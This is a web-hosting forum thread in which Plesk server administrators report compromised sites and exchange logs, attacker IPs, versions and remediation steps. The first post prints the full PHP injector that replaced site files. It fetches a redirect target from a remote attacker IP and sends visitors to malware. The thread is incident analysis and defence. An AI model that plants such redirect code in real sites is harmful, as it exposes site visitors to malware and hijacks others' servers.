Under Attack?

[PGT92]

I run several domains under Plesk 10.0.0.

Last night I discovered that one of my domains had all the html and php files in the directory replaced with files that redirected visitors to a malware site. There was also a new domain created with a number of files in the directories. A quick Google search turned up a thread that showed I wasn't the only one: http://www.webhostingtalk.com/showthread.php?t=1253158

I removed the new domain and files, then replaced all the pages with redirects. I then changed my access passwords. Finally, I updated to Plesk 11.0.9. This was at 5am this morning.

I just discovered that there were two additional occurrences after this... one about two hours later and another about two hours after that. From what I've found, three other domains had all their web root directory files overwritten with files that included the following php code:

ini_set('display_errors',0);
if(!function_exists('sys_get_temp_dir')){
    function sys_get_temp_dir(){
        if(!empty($_ENV['TMP'])){
            return realpath($_ENV['TMP']);
        }
        if(!empty($_ENV['TMPDIR'])){
            return realpath($_ENV['TMPDIR']);
        }
        if(!empty($_ENV['TEMP'])){
            return realpath($_ENV['TEMP']);
        }
        $tempfile=tempnam(__FILE__,'');
        if(file_exists($tempfile)){
            unlink($tempfile);
            return realpath(dirname($tempfile));
        }
        return null;
    }
}
$geturl='http://188.190.124.81/tds.php';
$timeout=180;
$default_url='http://www.google.com/robots.txt';
if(!$geturl)exit();
$base=ini_get('upload_tmp_dir');
if($base==null)$base=sys_get_temp_dir();
$tmp_settings=$base."/settings.json";
$settings=file_exists($tmp_settings)?unserialize(file_get_contents($tmp_settings)):array('last'=>0,'url'=>$default_url);
if($settings['last']<time()-$timeout){
    if($settings['url']=file_get_contents($geturl)){
        $settings['last']=time();
        $fp=fopen($tmp_settings,'w');
        flock($fp,LOCK_EX);
        fputs($fp,serialize($settings));
        flock($fp,LOCK_UN);
        fclose($fp);
    }
}
$url=$settings['url']?$settings['url']:file_get_contents($geturl);
if(substr($url,0,4)!='http')$url="http://".$url."/";
header("Location: $url");
exit();

I once again replaced the files and changed some passwords. I checked web access and Plesk logs, but there's nothing out of the ordinary. I ran Watchdog, but nothing came up that I couldn't rule out from Google searches.

Any ideas on where to look for the problem?

 

[Merinet]

Hi PGT92,

Please check your last ftp access (i.e: last -60) and check for some IP address that has access several FTP accounts.

Seems some kind of Plesk security issue or more proftpd vulnerability.

We've just found 2 servers with same problem. Both Plesk 11.0.9 with MU #48 plain vanilla install 1 week ago.

cat /usr/local/psa/version
11.0.9 Debian 6.0 110120608.16

proftpd -v
ProFTPD Version 1.3.4a

For now, you should clean all modified files, list them:
find /var/www/vhosts/*/httpdocs/*php -ctime -2
Block those IPs on iptables, and stop proftpd ( switch off at /etc/xinetd.d/ftp_psa and restart xinetd)

We're still investigating. But for now it seems Plesk security issue. Someone gets access to plesk accounts and just login...

 

[PGT92]

It seems most of the log files have been cleared when I upgraded Plesk. I did notice that the creation date on the mysterious domain that appeared was April 2nd... unfortunately my Plesk action log file only goes back 30 days, so I can't see the records of when that was created.

 

[Merinet]

Hi PGT92.

In fact, in both, we found the phantom domain "superkkt.com" on old server, but we reinstalled whole server and imported with PMM only the selected domains.
Maybe some websites where already infected with some sort of troyan?
We're already inspecting al files on servers

 

[IgorG]

Someone, please provide me exact OS, Plesk, microupdate and proftpd versions of server, which you suspect is vulnerable. And provide me more details why do you think so? Thanks.

 

[Merinet]

Hi Igor:

11.0.9 with MU #48 plain vanilla installed 1 week ago.

cat /usr/local/psa/version
11.0.9 Debian 6.0 110120608.16

proftpd -v
ProFTPD Version 1.3.4a

We found logins with FTP accounts that have not been given to customer. Just random (secure) generated ones 1 week ago when server was reinstalled.

 

[Frontis]

Hi Igor,

10.4.4 Update #49, last updated at April 27, 2013 06:26 AM
OS: Linux 2.6.32-34-generic-pae
Ubuntu 10.04

 

[RolandE]

Confirm we're also seeing this.

Plesk 9.5.4
9.5.4 CentOS 5 95110630.14
ProFTPD Version 1.3.2e

Further information: we maintain IP restrictions on mysql and shell access.

Example log entries:

> May 5 06:56:58 lnx03 xinetd[7535]: START: ftp pid=1675 from=188.190.124.120
> May 5 06:56:58 lnx03 proftpd[1675]: OURHOST (188.190.124.120[188.190.124.120]) - FTP session opened.
> May 5 06:56:58 lnx03 proftpd[1675]: OURHOST (188.190.124.120[188.190.124.120]) - Preparing to chroot to directory '/var/www/vhosts/subdomain.example.com'
or..

> May 7 16:17:00 lnx03 xinetd[7535]: START: ftp pid=21778 from=188.190.124.81
> May 7 16:17:00 lnx03 proftpd[21778]: OURHOST (188.190.124.81[188.190.124.81]) - FTP session opened.
> May 7 16:17:00 lnx03 proftpd[21778]: OURHOST (188.190.124.81[188.190.124.81]) - Preparing to chroot to directory '/var/www/vhosts/example.com'

 

[hamed23100]

Hi,

same problem.
Plesk 9.5.5
windows server 2008 R2

 

[TairkH]

Same problem here i found 2 domains are infected and see the bad guy's login with ftp.

Centos 5.9
Plesk 11.0.9. MU 48

 

[PGT92]

Plesk 11.0.9 Update #49
11.0.9 RedHat el5 110120608.16
ProFTPD Version 1.3.4a

However, the original break-in occurred under Plesk 10.0.0. Main passwords were changed and within an hour Plesk was updated to the current version. Within 4 hours there were two additional break-ins. All passwords were then changed and no additional incidents have occurred since yesterday.

I too had the 'superkkt.com' domain created. Today I remembered I have logwatch files emailed to an unused email account... I was able to find them and discovered a variety of strange occurrences beginning mid-March. Prior to this, there are no ProFTPD login attempt failures, but afterwards there are several originating from a Chinese IP. These continued from time to time until April 2nd, which is the day the 'superkkt.com' domain was created. On April 3rd, there were two logins through 'superkkt.com' from an IP in Eastlake, Michigan. After these, there are no additional logins outside of my own through ProFTPD, nor login failures.

EDIT: Just read my logwatch files from the past two days... for the break-in of May 6th, which changed files on one of my domains, there's entries for an IP in the Ukraine... this is the one that overwrote my files with redirect pages. There's a second set of entries from another IP in China, which doesn't seem to have affected anything. The Ukraine IP is seen again the following day, in the domains that I had issues with after the Plesk update. The logins are all valid logins I created, so if they're accessing ProFTPD through them, they didn't do it by guessing my passwords... they're extremely complex.

 

[TairkH]

Any news on this?

 

[EricVis]

I'm sure you know about this http://arstechnica.com/security/201...-attack-targeting-apache-hijacks-20000-sites/
It was related with Plesk bug 9.x and 10.x - I think not Plesk 11
This happened around mid-march on large scale so it is possible that server was compromised a while ago and all account passwords have been stolen and when upgraded and migrated to new plesk bad guyes used old ftp passwords, not sure if that's the case but could be for some people

looks like PARALLELS people don't take this seriously... so what I did to avoid infection until they decide to do something about it:
- plesk/ssh limited to few IPs
- changed all ftp/accounts passwords
- reinstalled sshd
- limit proftpd for now to few IP only
- installed CSF firewall to catch possible breakins and block access to the server (needs lots of adjustments for plesk)

 

[EricVis]

infection

I'm sure you know about this http://arstechnica.com/security/201...-attack-targeting-apache-hijacks-20000-sites/
It was related with Plesk bug 9.x and 10.x - I think not Plesk 11
This happened around mid-march on large scale so it is possible that server was compromised a while ago and all account passwords have been stolen and when upgraded and migrated to new plesk bad guyes used old ftp passwords, not sure if that's the case but could be for some people

looks like PARALLELS people don't take this seriously... so what I did to avoid infection until they decide to do something about it:
- plesk/ssh limited to few IPs
- changed all ftp/accounts passwords
- reinstalled sshd
- limit proftpd for now to few IP only
- installed CSF firewall to catch possible breakins and block access to the server (needs lots of adjustments for plesk)

 

[TairkH]

Hmmm i never had plesk 9 , 10 this machine was a clean install with plesk 11.0.9

 

[GaborZ]

Hi,

We run Parallels Plesk Panel 9.0 on a Windows Web Server 2008.

We have multiple domains on it, and right the first one was hacked (only that one, the other 10+ are showing no problems yet). All .php files were overwritten by the code above, posted by PGT92, but only the ones which are in the root.
Also, the Plesk stopped working, and displays a "HTTP Error 503. The service is unavailable." error.

 

[AeroWeb]

Same problem
Plesk 8.1.1
Windows Server 2003

Also confirming that the exploiters are getting in via FTP. It appears this security whole is affecting both Linux and Windows admins using Plesk. It does not appear as the FTP server is the issue but rather Plesk itself.

As a temporary fix, we recommend blocking the following IP's to help prevent further issues.
60.177.172.250
88.198.20.247
188.190.124.120
188.190.124.81

 

[ErwinD]

Hello,
We also had the Ukrain visitors on our webserver.
Plesk was at 9.5.3 and update it immediately to 9.5.4... Don't dare to go higher. Running on Ubuntu 8.04.4 LTS (hardy)
Changed maximum of passwords and added a few lines in the firewall (in+out).
Our Windows office network was infected at the same time by all kinds of malware. Took me days to clean everything.
Still one question: my proftpd is at version 1.3.2e. As far as I can understand, this version is the highest that works with Plesk 9.5.3.
Is that correct or can I go higher without breaking things?
Thanks for pointing that out.
Erwin

 

[Azurel]

If only you upload files on the server, you can stop ftp with:

chkconfig ftp_psa off

So you can check the attacker use ftp or plex to break in. I use WinSCP (SSH) to login as root.

 

[Spyder]

HI Guys,

Today I identified near same behaviour on one of our old servers (all changed files with date of 05/13/2013 more or less 01 AM) today.

Massive brute force to ftp server, and on some domains the same kind of archive.

No new domains created, only archives modified.

On compromised domains ALL .php and .html, seems to be downloaded, edited and uploaded again or @ least edited with some win box (all have ^M) @ end.

I digg all the server and seems OK.

Droped all FTP traffic to all servers @ firewall level, but just now.

What is the easy way to script something to "clean" all files ?? as there is no sense in clean install and migration with compromissed files via PMM.

Thank you.

Jr